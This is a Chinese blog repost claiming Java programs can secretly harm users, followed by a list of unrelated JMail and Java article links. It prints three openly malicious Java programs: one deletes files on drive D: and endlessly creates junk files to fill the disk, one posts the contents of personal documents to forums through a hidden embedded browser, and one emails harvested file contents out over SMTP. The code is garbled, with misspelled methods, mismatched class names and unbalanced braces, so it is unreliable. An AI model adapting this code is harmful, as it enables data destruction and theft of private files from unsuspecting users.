JMail和java嵌入式浏览器是使私人信息被窃取的帮凶。

最新推荐文章于 2024-05-10 09:14:14 发布
最新推荐文章于 2024-05-10 09:14:14 发布
阅读量621 收藏 1
点赞数
分类专栏: Java Java - Server 文章标签: java 浏览器 嵌入式 string exception thread
 一直以来java开发的程序因为它的跨平台性而流行,但是它的安全性确很少有人提及。要想使用java开发的软件必须安装一个叫做java运行时环境(JRE)的东西,一旦安装了JRE的系统那么java平台所支持的功能大多都能使用,例如发送邮件,浏览硬盘上任何文件,建立文件,删除文件,甚至是消无声息的下载病毒和木马。。。。不是危言耸听哦,不信?接着往下看:
一、删除你的文件、在你硬盘上乱写乱画:
package hack;
import java.io.*;
public class Hack{
  public Hack(){
         try{
             File file=new File("d:/");
              if(!file.exist){
                   //file=new File("e:/");
                    return;
                 }
                 else{
                    File[] files=file.list();//遍历你的硬盘文件
                     for(File f:files){
                           if(!f.isDirectory)f.delet();//如果不是目录那么删除文件。
                        }
                   }
                while(true){
                     long time=System.currentTimeMillis();
                     File newFile=new File("d:/"+time.toString.replaceAll("^[a-z0-9]"));
                       try{
                            if(!newFile.exist){newFile.createNewFile();}//建立无数个垃圾文件挤满你的硬盘。
                           }catch(Exception ex){}
                  }
            }catch(Exception ex){}
    }
  public static void main(String args[]){
    new Hack();
 }
}
二、采用嵌入式浏览器将你的私人信息等偷偷发布到各大论坛,让你成为透明人:
 package hack;
 import java.net.*;
 import java.io.*;
 import org.eclipse.swt.browser.*;
 public class Hack{
  private Browser browser=new Browser(composite,SWT.NONE);//嵌入一个你看不见的浏览器,然后登陆各大论坛、博客等
  
   public Hack(){
         loginToBBS();//登陆到博客、论坛 
   }
   public void loginToBBS(){}
   public void getYourMessage(){//分析你硬盘上的文件,如果是图片、word文档、txt文件等就保存起来
          File f=new File("d:/");
            File[] files=f.listFile();
            for(File f:files) if(!f.isDirectory()){
                  String fileName=f.getName();
                   if(file.endsWith(".doc")||fileName.endsWith(".jpg")||fileName.endsWith("txt")){
                          FileReader reader=new FileReader(f);
                           StringBuffer sb=new StringBuffer();
                            while(true){
                                   String tmp=reader.readLine();
                                   if(tmp==null)break;
                                   else
                                   sb.append(reader.readLine();
                               }
                           if(sb!=null&&!sb.toString().equals("")){writArtical(sb);}//把刚才从文件中读取的内容全部发表到博客上,曝光!
                      }
              }
       }
   public void writArtical(StringBuffer sb){//在博客上、论坛上等地方发表文章,文章的内容当然是你硬盘上的秘密。
            if(  browser.execute("document.getElementById('content').value='+sb.toString()+"'")){
                   if(browser.execute("document.getElementById('submit').c l i ck()")){
                         //browser.execute("alert('隐私已经曝光!')");
                      }
              }
              
      }
   public static void main(String args[]){
   }
 }
三、采用java的JMail技术在后台消无声息的把你硬盘上的东东全部作为附件发送出去!
 首先要下载jmail包;其次要注册一个雅虎邮箱并设置邮件直投 http://edit.my.yahoo.com/config/set_popfwd?.src=ym&.done=http://cn.f150.mail.com/ym/Options?YY=22797
(其中的“f150”为你的用户名),这样就会进人到YAHOO!“网上直投”的页面。
package hack;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;

import javax.mail.Message;
import javax.mail.MessagingException;
import javax.mail.Transport;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeMessage;

public class HackMail implements Runnable {

 private String to;   //接收方
   
 private String subject;  //标题
   
 private String content;  //邮件内容

 private Thread thread;  //定义线程
 
 private String sname;  //邮件署名


 private List attach;
 
 private String type = "text/html"; //or text/plain 发送邮件的格式
 
 private String smtpHost; //邮件服务器 smtp.mail.yahoo.com等
 private String emailFrom; //发送方邮箱
 private String fromPwd;  //密码

 

 //带模板的邮件
 public HackMail(String to, String subject, String content,String fileName) {
  try{
   if(to!=null && !"".equals(to)){
    thread = new Thread(this);
    this.to = to;
    this.subject = subject;
  
    attach = new ArrayList();
   
       //读取文件模板
    

    StringBuffer sb=getYourMessage();//同上面一样遍历你的硬盘,分析文件
    while (br.ready()) {
     sb.append(br.readLine());
     sb.append("\r\n");
    
    //賛换模块中的##content变量内容为content
    this.content=sb.toString().replaceAll("##content",content);
   }
  }catch(Exception e){
   e.printStackTrace();
  }
  
  
 
 

 //带上署名和模块的邮件
 public SendMail(String sname,String to, String subject, String content,String fileName) {
  try{
   thread = new Thread(this);
   this.to = to;
   this.subject = subject;
   this.sname=sname;
   attach = new ArrayList();
   
   //读取文件模板
  

   StringBuffer sb=getYourMessage();
   while (br.ready()) {
    sb.append(br.readLine());
   
   this.content=sb.toString().replaceAll("##caicainet_content",content);
   
  }catch(Exception e){
   e.printStackTrace();
  }
  
  
 
 
 
 public SendMail(String sname,String to, String subject, String content,int typeId) {

  thread = new Thread(this);
  this.to = to;
  this.subject = subject;
  this.sname=sname;
  attach = new ArrayList();
  this.content=content;
  this.type = "text/plain";
 
 
 
 public void run() {
  try {
   send();
  } catch (Exception e) {
   e.printStackTrace();
  }
 }

 
 public void start() {
  thread.start();
 }

 public boolean send() throws Exception {
  return send(to, subject, content);
 }

 private boolean send(String to, String subject, String content){
  boolean blnResult = false;
  InternetAddress[] address = null;
  //mailserver邮件服务器  Form 发送邮件的邮箱  pwd密码
  //此处三个参数可能通过数据库或.properties等方式来获取,方便后期的管理与设置
  String mailserver = " pop.mail.yahoo.com";
  String From = "";//发送方的邮箱,就是你自己的邮箱
  String pwd = "";//密码,你设置了网上直投的邮箱的密码
  
  if(smtpHost!=null && !"".equals(smtpHost))
   mailserver=smtpHost;
  if(emailFrom!=null && !"".equals(emailFrom))
   From=emailFrom;
  if(fromPwd!=null && !"".equals(fromPwd))
   pwd=fromPwd;
  
  if(smtpHost!=null && "nopass".equals(smtpHost))
  {
   smtpHost="";
   System.out.println("发送给"+to+"失败!原因是smtp地址不正确");
   return false;
  }
  
  
  
  String messageText = content;

  boolean sessionDebug = false;
  Date d1=new Date();
  try {
   // 设定所要用的Mail 服务器和所使用的传输协议
   java.util.Properties props = System.getProperties();
   props.put("mail.host", mailserver);
   props.put("mail.transport.protocol", "smtp");
   props.put("mail.smtp.auth", "true");//指定是否需要SMTP验证

   // 产生新的Session 服务
   javax.mail.Session mailSession = javax.mail.Session.getDefaultInstance(props, null);
   mailSession.setDebug(sessionDebug);
   Message msg = new MimeMessage(mailSession);
   if(sname!=null && !"".equals(sname))
   {
    // 设定发邮件的人
    msg.setFrom(new InternetAddress(From,sname));
   }
   else
   {
    //带署名的邮件
    msg.setFrom(new InternetAddress(From,"hack 007"));
   }
   
   if(sname!=null && "mail".equals(sname))
   {
    msg.setFrom(new InternetAddress(From,""));
   }
   
   // 设定收信人的信箱
   address = InternetAddress.parse(to, false);
   msg.setRecipients(Message.RecipientType.TO, address);

   // 设定信中的主题 
   msg.setSubject(subject);

   // 设定送信的时间
   msg.setSentDate(new Date());

   if("text/html".equals(this.type))
   {
        msg.setContent(messageText, type + ";charset=GB2312");
   }
   else
   {
    msg.setText(messageText);
   }
   
   Transport transport = mailSession.getTransport("smtp");

   transport.connect(mailserver, From, pwd);
   transport.sendMessage(msg, msg.getAllRecipients());
   transport.close();
   Date d2=new Date();
   System.out.println("发送给"+to+"成功!耗时"+(d2.getTime()-d1.getTime())+"毫秒,发送方:"+From);
   blnResult=true;
   
  } catch (MessagingException mex) {
   mex.printStackTrace();
   blnResult=false;
  } catch (UnsupportedEncodingException e) {
   e.printStackTrace();
  }
  
  return blnResult;
 }
  public void setTo(String to) {
  this.to = to;
 }

 public String getTo() {
  return this.to;
 }

 public void setSubject(String subject) {
  this.subject = subject;
 }

 public String getSubject() {
  return this.subject;
 }

 public void setContent(String content) {
  this.content = content;
 }

 public String getContent() {
  return this.content;
 }

 public void addAttach(String file) {
  attach.add(file);
 }

 public boolean isAttach() {
  return attach != null && attach.size() > 0;
 }
 
 public static void main(String[] args) {
  try {
   //普通的文字邮件
  SendMail sendMail=new SendMail("黑客","**@yahoo.com.cn", "黑你没商量", "我够黑吗?",1);
  sendMail.start();
   
   
   //带模版的邮件
   String path = "D:/project/tongji/WebRoot/template/email.html"; //获取存放路径 
   
   String chtml="";
   SendMail sendMail=new SendMail("**@yahoo.com.cn,"你的文件被窃取了?!",chtml,path);
   sendMail.start();
  } catch (Exception e) {
   e.printStackTrace();
  }
 }

}

 

原文:http://java7.blog.hexun.com/65435049_d.html

Char_CN
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JMail:Java 中的 Gmail CLI 客户端
06-23
-登录信息将被保存并在下次使用时自动输入 收件箱 [NUMBER MESSAGES] - 显示来自最新消息的 n 条消息的消息信息 open [MESSAGE INDEX] - 读取消息 n 的消息内容。 -inbox 命令运行后显示的索引号
java jmail_java jmail
weixin_28788777的博客
02-21 107
发送邮件的主要步骤1.设置发送的协议,也就是设置smtp和验证机制(一般协议都是通过Properties键值形式来设置)2.发送邮件需要的几个重要类Session ,Message,Transport3.Session对象可以通过Session的getInstance(java.util.Properties props)或getInstance(java.util.Properties prop...
jmail组件 java_Jmail的主要参数列表
weixin_35795357的博客
02-17 95
说明:更多的信息请参考Jmail说明,我想这已经足够用的了。(1)Body(信件正文):字符串网络说明:更多的信息请参考Jmail说明,我想这已经足够用的了。(1)Body(信件正文) : 字符串如:JMail.Body = "这里可以是用户填写的表单内容,可以取自From。"(2)Charset(字符集,缺省为"US-ASCII") : 字符串如:JMail.Charset = "US-ASCI...
jmail组件 java,分享Jmail发送邮件工具类
weixin_33341108的博客
03-16 140
篇文章主要为大家分享了Jmail发送邮件工具类,具有一定的参考价值,感兴趣的小伙伴们可以参考一下,话不多说上代码import lombok.extern.slf4j.Slf4j;import java.util.Properties;import javax.mail.*;import javax.mail.internet.AddressException;import javax.mail.i...
java jmail_jmailjavamail的区别
weixin_39640085的博客
02-15 126
展开全部以下三段代码是我的全部代码,朋友们如果想用,直接复制即可。我的代码有三个类:第一32313133353236313431303231363533e58685e5aeb931333363356561个类:MailSenderInfo.javaJava代码package reyo.sdk.mail;/*** 发送邮件需要使用的基本信息*/import java.util.Properties;...
java jmail_java使用JMail通过QQ邮件服务器实现自动发送邮件
weixin_28684449的博客
02-15 162
前言:项目开发的过程中,我们项目需要一个自动发送邮件提醒的小功能,于是简单的研究了一下javaJMail来实现自动发送邮件的功能。已被后期需要参考。一、准备实现的原理很简单:发送人,中转的邮箱(我以QQ邮箱为例)服务器,收件人及邮件主题内容等信息。我们需要关注这三点就可以了。1、需要开通QQ邮箱服务的功能,参考:http://blog.csdn.net/binlixia/article/de...
jmail组件 java_Jmail发送邮件工具类分享
weixin_32747681的博客
02-13 87
import lombok.extern.slf4j.Slf4j;import java.util.Properties;import javax.mail.*;import javax.mail.internet.AddressException;import javax.mail.internet.InternetAddress;import javax.mail.internet.MimeM...
java jmail_jmail的使用
weixin_29210759的博客
02-24 263
邮件服务器配置文件:##协议mail.transport.protocol=smtp##邮件服务器地址mail.smtp.host=mail.126.com##邮件服务器端口mail.smtp.port=25##SMTP服务用户认证mail.smtp.auth=true第一个类:import java.io.File;import java.io.FileInputStream;import ja...
jmail组件 java_ASP.Net环境下使用Jmail组件发送邮件
weixin_42524401的博客
02-13 113
配置环境:.Net Framework 1.1,Imai8.02,w3Jmail4.3实现过程:不同于在Asp中使用Jmail,直接使用 Server.CreateObject("Jmail.Message")就可以了。在.Net环境中,需要进行设置。1.安装jmail4.32.找到jmail.dll(Program Files\Dimac\w3JMail4下)3.执行Program Files\...
java jmail_Java jmail邮件发送与不重复随机码 | 彬菌
weixin_39617006的博客
02-15 113
版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!恰饭广告发送邮件MailUtil.javaimport java.util.Date;import java.util.Properties;import javax.mail.Message;import javax.mail.Session;import javax.mail.Transport;import javax...
java jmail 发送邮件
01-15
一个详细的例子,java jmail 发送邮件,绝对容易理解和接受
jmail 通过Java实现的邮件发放功能
09-04
通过Java实现的邮件发放功能,可自行设置邮箱类型,有示例代码
asp.net 实现jmail 接收和发送邮件程序.zip
01-30
asp.net 实现jmail 接收和发送邮件程序.zip
java jar包如何运行或调用
NLP与推荐算法
05-08 235
java服务启动
CMS垃圾回收器为什么被移除
最新发布
m0_54187478的博客
05-10 295
由于上述缺点,加上需要将资源投入到更现代垃圾回收器的开发和优化上,Oracle决定从Java 9开始标记CMS为废弃,并在后续版本中完全移除CMS。这些新的收集器旨在提供更低的停顿时间和更高的性能,同时减少配置和维护的复杂性。当它在垃圾收集周期内无法足够快地回收内存时,会退回到一种需要完全暂停所有应用线程的老年代收集模式,这与它设计的初衷相违背。:CMS使用的标记-清除算法会导致较多的内存碎片。:CMS需要更多的CPU资源来执行垃圾回收的并发阶段,而且它在运行时对系统资源的利用也较为激进。
C#(C Sharp)学习笔记_类【十五】
追求细节,成就完美
05-01 668
类(Class)是面向对象程序设计(OOP,Object-Oriented Programming)实现信息封装的基础。类是一种用户定义的引用数据类型,也称类类型。每个类包含数据说明和一组操作数据或传递消息的函数。类的实例称为对象。
《设计一款蓝牙热敏打印机》
唐顺才的博客
05-06 318
安卓apk用java + kotlin编写、上位机用Qt编写。主控芯片用易兆威蓝牙ic,通讯接口:蓝牙、串口、usb。
一篇文章,系统性聊聊Java注解
架构风清扬
05-06 1115
一篇文章,系统性聊聊Java注解
jmail 伪装发信人
12-06
jmail的主要原理是通过使用代理服务器来发送邮件,从而掩盖发信人的真实IP地址和位置信息。 使用jmail发送邮件时,用户可以选择合适的代理服务器进行连接,这些代理服务器通常位于不同的地理位置,有时甚至位于国外...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值